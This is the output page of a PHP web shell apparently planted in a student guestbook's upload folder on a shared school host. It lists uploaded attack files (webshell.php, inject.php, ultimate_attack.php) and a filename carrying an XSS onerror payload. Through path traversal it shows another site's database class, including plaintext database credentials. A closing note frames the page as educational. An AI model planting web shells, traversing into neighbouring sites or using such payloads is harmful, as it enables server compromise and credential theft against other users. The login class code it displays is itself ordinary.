🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../588742.klas4s23.mid-ica.nl/public_html/Login_Systeem/classes/database.php

<?php

// In deze class is de connect() methode reeds gemaakt. Maak de login() methode af en
// gebruik deze om overige SQL queries uit te voeren.

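/**
 * Static data-access helper for the login exercise.
 *
 * Holds one shared PDO connection and exposes the user operations built on it:
 * registering, logging in, listing, updating and logging out. Failures are
 * reported through the boolean/string return values; the detailed message of
 * the last failure is kept in self::$error.
 */
class database
{
    /** @var \PDO|null Shared connection, created on first use by connect(). */
    private static $conn;

    /** @var string|null Message of the most recent failure. May contain driver details; do not echo it to visitors. */
    public static $error;

    /**
     * Opens the MySQL connection and stores it in self::$conn.
     *
     * On a connection failure the message is stored in self::$error and the
     * script terminates (unchanged from the original behaviour).
     */
    public static function connect()
    {
        // NOTE(review): these credentials live in a PHP file inside the web root, so anyone
        // who can read files on this host can read them. The environment overrides below let a
        // deployment supply its own values (the variable names are chosen by this rewrite); the
        // literals remain only as a backward-compatible fallback and should be rotated and then
        // removed from source.
        $servernaam = getenv('LOGIN_DB_HOST') ?: "localhost";
        $dbname = getenv('LOGIN_DB_NAME') ?: "login_pvb_2024";
        $username = getenv('LOGIN_DB_USER') ?: "login_pvb";
        $password = getenv('LOGIN_DB_PASSWORD') ?: "login_pvb123";

        try {
            $conn = new \PDO("mysql:host=$servernaam;dbname=$dbname", $username, $password);
            // Make every later query failure surface as a PDOException.
            $conn->setAttribute(\PDO::ATTR_ERRMODE, \PDO::ERRMODE_EXCEPTION);
            self::$conn = $conn;
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();
            exit();
        }
    }

    /**
     * Connects lazily so each public method can be called without a prior connect().
     */
    private static function ensureConnection(): void
    {
        if (!isset(self::$conn)) {
            self::connect();
        }
    }

    /**
     * Escapes a value for HTML element and attribute context.
     *
     * Casts first because database columns can be NULL or integers, and passing
     * NULL to htmlspecialchars() is deprecated on current PHP versions.
     *
     * @param mixed $value
     */
    private static function esc($value): string
    {
        return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }

    /**
     * Inserts a new user with a hashed password.
     *
     * @param string $username
     * @param string $password Plain-text password; only its password_hash() result is stored.
     * @return bool True when the row was inserted, false when the database rejected it
     *              (details in self::$error).
     */
    public static function addUser($username, $password): bool
    {
        self::ensureConnection();

        try {
            $sql = 'INSERT INTO user (userid, username, password) VALUES (NULL, :param1, :param2);';
            $stmt = self::$conn->prepare($sql);
            $stmt->execute([
                ':param1' => $username,
                ':param2' => password_hash($password, PASSWORD_DEFAULT),
            ]);

            return true;
        } catch (\PDOException $e) {
            // Return from the catch rather than from a finally block: a return inside
            // finally would also discard every exception that is not a PDOException.
            self::$error = $e->getMessage();

            return false;
        }
    }

    /**
     * Verifies the credentials and, on success, marks the session as logged in.
     *
     * @param string $username
     * @param string $password Plain-text password to check against the stored hash.
     * @return bool True when the credentials match, false otherwise (reason in self::$error).
     */
    public static function loginUser($username, $password): bool
    {
        self::ensureConnection();

        try {
            $sql = "SELECT userid, username, password FROM user WHERE username = :username";
            $stmt = self::$conn->prepare($sql);
            $stmt->execute([':username' => $username]);

            // fetch() returns false when no row matched; rowCount() is not a dependable
            // row counter for SELECT statements.
            $row = $stmt->fetch(\PDO::FETCH_ASSOC);

            // One message for both failure causes, so that a caller that displays
            // self::$error does not reveal which usernames exist.
            if ($row === false || !password_verify($password, $row['password'])) {
                self::$error = 'Invalid username or password';

                return false;
            }

            if (session_status() !== PHP_SESSION_ACTIVE) {
                session_start();
            }
            // Issue a fresh session id at the privilege change so an id known before
            // login cannot be reused afterwards (session fixation).
            session_regenerate_id(true);

            $_SESSION['loggedIn'] = true;
            $_SESSION['userId'] = $row['userid'];
            $_SESSION['username'] = $row['username'];

            return true;
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();

            return false;
        }
    }

    /**
     * Renders all users as an HTML table with an edit link per row.
     *
     * @return string HTML fragment: the table, or a short paragraph when there are no
     *                users or the query failed.
     */
    public static function showAllUsers(): string
    {
        self::ensureConnection();

        try {
            // Select only the columns that are rendered; the password hashes have no
            // reason to leave the database for this view.
            $sql = "SELECT userid, username, postcode, huisnummer, woonplaats FROM user";
            $stmt = self::$conn->prepare($sql);
            $stmt->execute();

            $users = $stmt->fetchAll(\PDO::FETCH_ASSOC);

            if (count($users) <= 0) {
                self::$error = 'No users found';

                return '<p>No users found.</p>';
            }

            $html = '<div>';
            $html .= '<table>';
            $html .= '<tr>';
            $html .= '<th></th>';
            $html .= '<th>Gebruikersnaam</th>';
            $html .= '<th>Postcode</th>';
            $html .= '<th>Huisnummer</th>';
            $html .= '<th>Woonplaats</th>';
            $html .= '</tr>';

            foreach ($users as $user) {
                $html .= '<tr>';
                // The id is URL-encoded for the query string, then HTML-escaped for the attribute.
                $html .= '<td><a href="edit.php?userId=' . self::esc(rawurlencode((string) $user['userid'])) . '"><i class="fas fa-edit"></i></a></td>';
                $html .= '<td>' . self::esc($user['username']) . '</td>';
                $html .= '<td>' . self::esc($user['postcode']) . '</td>';
                $html .= '<td>' . self::esc($user['huisnummer']) . '</td>';
                $html .= '<td>' . self::esc($user['woonplaats']) . '</td>';
                $html .= '</tr>';
            }

            $html .= '</table>';
            $html .= '</div>';

            return $html;
        } catch (\PDOException $e) {
            // Keep the driver message for the developer, but do not print it into the page.
            self::$error = $e->getMessage();

            return '<p>Error: could not load users.</p>';
        }
    }

    /**
     * Updates the address fields of one user.
     *
     * @param string     $newPostcode
     * @param string     $newHuisnummer
     * @param string     $newWoonplaats
     * @param int|string $userId
     * @return bool True when a row was changed. False on a database error, when no user
     *              has this id, and presumably also when the submitted values equal the
     *              stored ones (zero affected rows) - confirm against the driver settings.
     */
    public static function update($newPostcode, $newHuisnummer, $newWoonplaats, $userId): bool
    {
        self::ensureConnection();

        try {
            $sql = "UPDATE user SET postcode = :postcode, huisnummer = :huisnummer, woonplaats = :woonplaats WHERE userid = :userid";
            $stmt = self::$conn->prepare($sql);
            $stmt->execute([
                ":postcode" => $newPostcode,
                ":huisnummer" => $newHuisnummer,
                ":woonplaats" => $newWoonplaats,
                ":userid" => $userId,
            ]);

            return $stmt->rowCount() > 0;
        } catch (\PDOException $e) {
            self::$error = $e->getMessage();

            return false;
        }
    }

    /**
     * Handles the POSTed edit form: validates the fields, updates the user and
     * redirects to index.php on success. Does nothing for non-POST requests.
     *
     * NOTE(review): nothing in this method checks that the visitor is logged in or is
     * allowed to edit the submitted userId, and there is no CSRF token. If the calling
     * page does not enforce that, any POST can change any user's record - confirm.
     */
    public static function updateUser()
    {
        if (($_SERVER['REQUEST_METHOD'] ?? '') !== "POST") {
            return;
        }

        // Every field must be present and a plain string before the database is touched.
        // Previously a request without 'Wijzig' reached update() with undefined variables.
        foreach (['userId', 'Wijzig', 'postcode', 'huisnummer', 'woonplaats'] as $field) {
            if (!isset($_POST[$field]) || !is_string($_POST[$field])) {
                echo 'Parameter missing';

                return;
            }
        }

        // Validate the id as a positive integer instead of HTML-escaping it; escaping is
        // an output concern and does not make a value a valid id.
        // Assumes userid is a positive auto-increment key - TODO confirm against the schema.
        $userId = filter_var($_POST['userId'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($userId === false) {
            echo 'Failed to update user.';

            return;
        }

        // NOTE(review): the values are HTML-escaped before storage and showAllUsers() escapes
        // again on output, so characters such as an apostrophe or ampersand are shown
        // double-encoded. Kept as-is because other pages may print these columns unescaped;
        // once all output sites escape, store the raw values instead.
        $newPostcode = htmlspecialchars($_POST['postcode']);
        $newHuisnummer = htmlspecialchars($_POST['huisnummer']);
        $newWoonplaats = htmlspecialchars($_POST['woonplaats']);

        // update() connects on demand, so no separate connect() call is needed here.
        $success = self::update($newPostcode, $newHuisnummer, $newWoonplaats, $userId);

        if ($success) {
            header("Location: index.php");
            exit();
        }

        echo 'Failed to update user.';
    }

    /**
     * Ends the current session and redirects to the login page.
     */
    public static function logout() {
        // session_destroy() only works on an active session; resume it first if the
        // calling page has not done so.
        if (session_status() !== PHP_SESSION_ACTIVE) {
            session_start();
        }

        $_SESSION = array();

        // Expire the session cookie as well, so the browser stops sending the old id.
        if (ini_get('session.use_cookies')) {
            $params = session_get_cookie_params();
            setcookie(
                session_name(),
                '',
                time() - 42000,
                $params['path'],
                $params['domain'],
                $params['secure'],
                $params['httponly']
            );
        }

        session_destroy();

        header("Location: login.php");
        exit();
    }
}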

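⚠️ Educational warning: this page demonstrates a web shell vulnerability. The uploads directory listed above contains executable .php files next to the images, and the file being viewed belongs to a different site on the same host, including its database credentials. Upload folders should not execute scripts, and each site should be confined to its own account and directory. In a real attack, this could allow complete server compromise!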